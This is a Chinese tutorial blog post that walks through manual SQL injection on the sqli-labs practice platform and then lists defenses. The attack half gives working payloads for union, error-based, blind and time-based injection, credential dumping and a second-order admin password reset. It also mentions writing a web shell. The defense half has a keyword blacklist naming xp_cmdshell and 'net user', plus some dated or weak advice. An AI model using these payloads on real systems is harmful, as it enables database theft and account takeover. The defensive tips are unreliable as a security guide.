如下是經過SLQi-labs平臺的部分簡單例題的手工注入過程php
頁面提示:Please input the ID as parameter with numeric valuehtml
咱們首先構造id參數值:前端
http://192.168.2.198/sqli-labs-master/Less-1/?id=1' or 1=1--+
肯定存在注入點,並猜想SQL語句爲:mysql
select [字段] from [表] where [id]="$id";
由於UNION聯合語句函數的格式要求,UNION後的聯合語句的回顯字段數要和UNION前的回顯列數一致……git
order by *
union select 1,2,……
注意:id的value咱們須要給一個不存在結果的valuesql
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
group_concat()
: 將group by產生的同一個分組中的值鏈接起來,返回一個字符串結果shell
上段~將數據庫中的全部表名拼接成一個字符串返回數據庫
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' --+
union select 1,group_concat(id,0x7e,email_id),3 from emails --+
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))=1 --+
extractvalue(XML,XPath)
從目標XML中返回包含查詢值得字符串瀏覽器
參數XML:String格式,爲XML文檔對象得名稱安全
參數XPath:xpath格式得字符串
由於咱們在xpath輸入的不是要求的xpath格式的字符串,因此函數會報錯返回xpath參數內容
xpath會被帶入mysql進行執行操做,發現不是xpath格式,可是隻有在執行後纔會發現,就會執行concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())
sql代碼,查詢內容而且concat拼接字符串,隨後由extractvalue函數返回報錯~
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))=1 --+
and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users)))=1 --+
從返回的結果發現問題,沒有顯示所有的字段信息;能夠利用篩選過濾條件來
and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users where username not in ('Dumb','Angelina'))))=1 --+
利用條件where約束來過濾掉咱們已知的字段信息,因而mysql在執行的時候就會越過Dumb和Angelina信息,顯示後面的信息……以此類推!咱們就能夠經過不斷的條件繞過回顯的模式來獲取全部內容!在不少狀況下咱們發現沒法徹底回顯內容,均可以利用這個方法來繞過已知字段信息
經過判斷注入點的語句,判斷注入點爲數字型注入點:
?id=1 and 1=1 --+ #判斷數字型注入點 ?id=1' and 1=1 --+ #判斷字符型注入點
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
?id=0 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
Less2的具體攻擊方法和Less1同樣,不一樣的是Less2是數字型注入,不須要單引號閉合
判斷注入點
從報錯信息顯示,咱們的id—value寫在SQL語句的括號中,換言之就是,這條SQL語句缺乏一個右括號~
肯定注入點和方法策略後按照Less1/2的方法UNION/報錯注入方法
判斷注入點
?id=1 ?id=1' ?id=1') ?id=1" # 報錯…… ^
咱們的ID值會放在SQL語句中,且被("$id")
包圍
?id=1") --+
按照這回顯,能夠認爲這是一處盲注……
SQL盲注點 ~~ UNION聯合(回顯)查詢的方法就不能夠了……
?id=1' and left(version(),1)='5' --+
left()
:從左截取a結果的1個長度的字符
只有當and
後面的sql語句爲True纔不會報錯~……
經過猜解的方式,利用left的方法猜解數據庫的版本信息第一個字符(環境是Mysql 5.1,因此版本信息第一個字符是‘5’)由此推演,咱們能夠利用布爾的判斷特性來猜解數據庫名……
如上~ 若是咱們不斷的對目標進行猜解,就能夠獲得數據庫名的第一個字符,以此類推第二個字符……第N個字符;數據庫名的長度也能夠經過length(database())>=*
進行猜解
牢記布爾盲注的特色:只有當and
後面的sql語句爲True纔不會報錯;報錯就表示and後的sql語句不成立……開動腦筋就能夠創造奇蹟
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 #
ascii(substr((select database()),1,1))=98
substr(a,b,c)
將a結果從b開始截取c長度字符,ascii()將字符轉爲ascii值
XPath報錯注入:
?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0x7e) --+
主要思路就是利用時間延遲來判斷布爾條件是否達成,本質上是利用時間延遲來進行布爾和報錯盲注的判斷依據條件;用於沒有任何回顯信息的時候使用~
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判斷語句, 條件爲假,
?id=1' and if(ascii(substr(database(),1,1))=96,1,sleep(10)) --+
ascii()
負責猜解;if()
負責判斷,如果猜解成立則返回1,如果猜解不成立延遲10秒
從報錯結果中,看出註釋符應該被禁了……並且從報錯結果認定布爾和報錯注入是不可舉的!!!
於者乎……時間盲注是最優選擇~~~
固然了……還有在這裏說一說文件的導入於導出的方法:
*- 借鑑sqli-labs-24
分析環境文件:
login.php
:查詢數據庫用戶存在和驗證登陸
login.php中使用了mysql_real_escape_string()
函數對用戶輸入的字符串進行處理;會將特殊字符進行轉義使之失去效果;可是~以後數據存儲進數據庫後轉義的字符會恢復原樣!
在login_create.php
註冊頁面中,使用了mysql_real_escape_string()
可是數據仍是會被存放在數據庫中……
數據會被完整的記錄在數據庫中
數據庫中有了咱們的「小玩意」以後……
登陸咱們的帳戶,由於咱們的帳戶是以admin'#
保存的,當然要這樣的去訪問和登陸
前端提交user和pass後,會在修改密碼頁面修改密碼
就這樣咱們成功的修改了admin的密碼!爲啥呢?
Sql 語句變爲 UPDATE users SET passwd=」New_Pass」 WHERE username =’ admin’ # ‘ AND password=’
也 就 是 執 行 了 UPDATE users SET passwd=」New_Pass」 WHERE sername =’admin’
利用註冊的admin’# 修改密碼時候從數據庫提取該數據 形成了數據 命令拼接
SQL注入能夠作什麼?若是從一個普通人的角度看,第一想起的就是「萬能密碼」即經過構造SQL注入語句繞過密碼驗證。
獲取數據庫信息
發現SQL注入點後,經過猜解的方式獲取當前數據庫的庫結構、表結構、字段內容,並經過Payload獲取服務器的物理路徑信息、用戶信息、敏感數據信息等,若是成功的得到了數據庫或服務器的高權限就能夠「拖庫」。
寫入Shell
經過SQL注入漏洞執行寫文件操做(寫入Shell),例如:loadfile()
into outfile
等函數均可以實現讀寫本地文件。固然讀寫文件的先決條件:文件的讀寫權限、文件爲可讀屬性、瞭解文件的物理路徑等。
本文的SQL注入防護將會基於「常見SQL注入環境搭建(by:Mirror王宇陽)」中的搭建的環境作出防護措施。
將經常使用的SQL注入字符寫入到黑名單中,而後經過程序對用戶提交的POST、GET請求以及請求中的各個字段都進行過濾檢查,篩選威脅字符。
# 部分敏感字符和字符串 delete from|from|count\(|drop table|update|truncate|mid\(|char\(|xp_cmdshell|exec master|netlocalgroup administrators|net user|[\{|\}|!|\']
# 前端處理 var str = "select * from table where id=123"; var reg = /(.*?((select)|(from)|(count)|(delete)|(update)|(drop)|(truncate)).*?){2,}/i; return(reg.test(str));
在字符過濾方面,一般過濾空格、括號、引號……等特殊字符,可是這些能夠繞過的:
舉例:過濾空格 select/**/name/**/from/**/user/**/where/**/id='kk' 或 select(name)from(user)where(id='kk')
經過這種方法就會規避對空格的過濾;過濾括號和引號select name from user wehere id=0x6b6b
0x6b6b(kk的十六進制)
因爲SQL注入過程當中須要構造較長的SQL語句,所以,一些特定的程序可使用限制用戶提交的請求內容的長度來達到防護SQL注入的目的,但這種效果並很差。
// 接收參數text if(isset($_GET['text']) && strlen($_GET['text']) < 10){ $text=$_GET['text']; } else { echo "輸入內容不符規範"; }
根據程序要求爲特定的表設置特定的權限,如:某段程序對某表只需具有select權限便可,這樣即便程序存在問題,惡意用戶也沒法對錶進行update或insert等寫入操做。
WEB目錄應至少遵循「可寫目錄不可執行,可執行目錄不可寫」的原則,在次基礎上,對各目錄進行必要的權限細化。
由於PHP語言沒有嚴格的限制數據類型的定義例如:「ID=1 就默認ID爲Intger ; name=kk 默認name爲string」在PHP的弱類型管理中這是不安全的。
舉例:
// 接收參數text if(isset($_GET['text'])){ $text=$_GET['text']; } // 拼接sql語句並執行 $sql="SELECT * FROM admin WHERE uid='$text' LIMIT 0,1"; echo 'SQL拼接結果:'.$sql; echo '<hr>'; // 執行sql語句並返回結果 $result=mysqli_query($conn, $sql);
這裏的text參數沒有限制咱們的輸入,理論上咱們的輸入應該限制爲「Intger」;當text接到' union select 1,database(),version(),4; -- +
參數後就會自動推導text爲「String」類型並拼接爲SQL語句。
這裏可使用is_numeric()
ctype_digit()
函數判斷數據類型
is_numeric():檢測變量是否爲數字或數字字符串;指定的變量是數字和數字字符串則返回 TRUE,不然返回 FALSE。
if(isset($_GET['text']) && is_numeric($_GET['text'])){ $text=$_GET['text']; } else { echo "輸入內容不符規範"; }
ctype_digit():純數字檢測;對指定的變量檢測判斷是否爲連續且純數字的字符串(字符串離全爲數字)。
if(isset($_GET['text']) && ctype_digit($_GET['text'])){ $text=$_GET['text']; } else { echo "輸入內容不符規範"; }
缺陷:
這裏只能夠有效的預防數字型的注入點,而String類型的注入點此方法則無效。
在字符型注入點,任何惡意的SQL攻擊都會包含一些特殊的字符,例如空格、括號、引號……等。若是存在敏感的特殊字符,須要使用字符轉義。
function safe_replace($string) { $string = str_replace('%20', '', $string); $string = str_replace('%27', '', $string); $string = str_replace('%2527', '', $string); $string = str_replace('*', '', $string); $string = str_replace('"', '"', $string); $string = str_replace("'", '', $string); $string = str_replace('"', '', $string); $string = str_replace(';', '', $string); $string = str_replace('<', '<', $string); $string = str_replace('>', '>', $string); $string = str_replace("{", '', $string); $string = str_replace('}', '', $string); …… …… …… …… return $string; }
對一些例如單引號、雙引號、反斜槓等特殊字符添加一個反斜槓以確保在查詢這些數據以前,用戶提供的輸入是乾淨的。但要注意,你是在鏈接數據庫的前提下使用這個函數。
這個函數的原理跟mysql_real_escape_string()類似。可是當在php.ini文件中,「magic_quotes_gpc「的值是「on」的時候,就不要使用這個函數。magic_quotes_gpc 的默認值是on,對全部的 GET、POST 和 COOKIE 數據自動運行 addslashes()。不要對已經被 magic_quotes_gpc 轉義過的字符串使用 addslashes(),由於這樣會致使雙層轉義。你可使用get_magic_quotes_gpc()函數來肯定它是否開啓。
這個函數對於過濾用戶輸入的數據很是有用。它會將一些特殊字符轉換爲HTML實體。例如,用戶輸入<時,就會被該函數轉化爲HTML實體<(<),輸入>就被轉爲實體>.(HTML實體對照表:http://www.w3school.com.cn/html/html_entities.asp),能夠防止XSS和SQL注入攻擊。
在HTML中,一些特定字符有特殊的含義,若是要保持字符原來的含義,就應該轉換爲HTML實體。這個函數會返回轉換後的字符串,例如‘&’ (ampersand) 轉爲’&‘(ps:請參照第三點中的實體對照表連接)
這個函數能夠去除字符串中全部的HTML,JavaScript和PHP標籤,固然你也能夠經過設置該函數的第二個參數,讓一些特定的標籤出現。
筆者在學習SQL注入期間瞭解的注入防護策略不多,可能也是實踐的操做仍是太少、代碼基礎仍有欠缺……By:Mirror王宇陽